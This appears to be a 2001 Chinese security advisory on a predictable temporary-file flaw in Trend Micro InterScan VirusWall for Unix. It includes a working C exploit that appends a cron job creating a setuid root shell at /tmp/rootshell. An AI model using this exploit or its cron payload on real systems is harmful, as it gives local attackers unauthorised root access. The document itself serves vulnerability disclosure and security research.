Trend Micro Interscan VirusWall 符号链接漏洞
发布日期:2001-01-18
更新日期:2001-01-18
受影响系统:
Trend Micro InterScan VirusWall for Unix 3.6x
Trend Micro InterScan VirusWall for Unix 3.0.1
描述:
BUGTRAQ ID: 2213
CVE(CAN) ID:
CAN-2001-0132
Interscan VirusWall 在所有人可写的 /tmp 目录中创
建临时文件时,文件名可预测。事先知道 Interscan
VirusWall 将以 root 权限运行的情况下,恶意用户可
以在 /tmp 目录中以猜测或预测的文件名创建符号连接
文件。如果文件名猜测正确,这个情况发生时符号连接
所指向的文件将被 VirusWall (它以 root 权限运行)
覆盖。如果攻击者可以控制被 VirusWall 写入临时文件
的数据,有可能获取 root 权限。
<* 来源:Joey Maier (
maierj@home.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <sys/stat.h>
#include <fcntl.h>
#define TMPFILE "/tmp/istmp_cron"
#define CRONTAB_ENTRY \
"* * * * * cp /bin/sh /tmp/rootshell; chmod 4755 /tmp/rootshell"
int main(int argc, char *argv[])
{
int file;
off_t file_size;
struct stat file_stat;
int rc;
/*###########################################################
## creating istmp_cron with permissions that allow changes ##
###########################################################*/
file = open(TMPFILE, O_RDWR | O_CREAT | O_APPEND, 0777);
if (file < 0) {
perror(TMPFILE);
return 1;
}
/*##################################################################
## wait for isinst to write to tmp file, then append our cronjob ##
##################################################################*/
rc = fstat(file, &file_stat);
file_size = file_stat.st_size;
while (1) {
rc = fstat(file, &file_stat);
if (file_stat.st_size != file_size) {
/*######################
## append our cronjob ##
######################*/
rc = write(file, CRONTAB_ENTRY, sizeof(CRONTAB_ENTRY) -1);
close(file);
return 0;
}
}
}
建议:
临时解决办法:
NSFOCUS建议您在没有打补丁或升级版本前换用别的替代产品。
厂商补丁:
暂无
浏览次数:3984
严重程度:0(网友投票)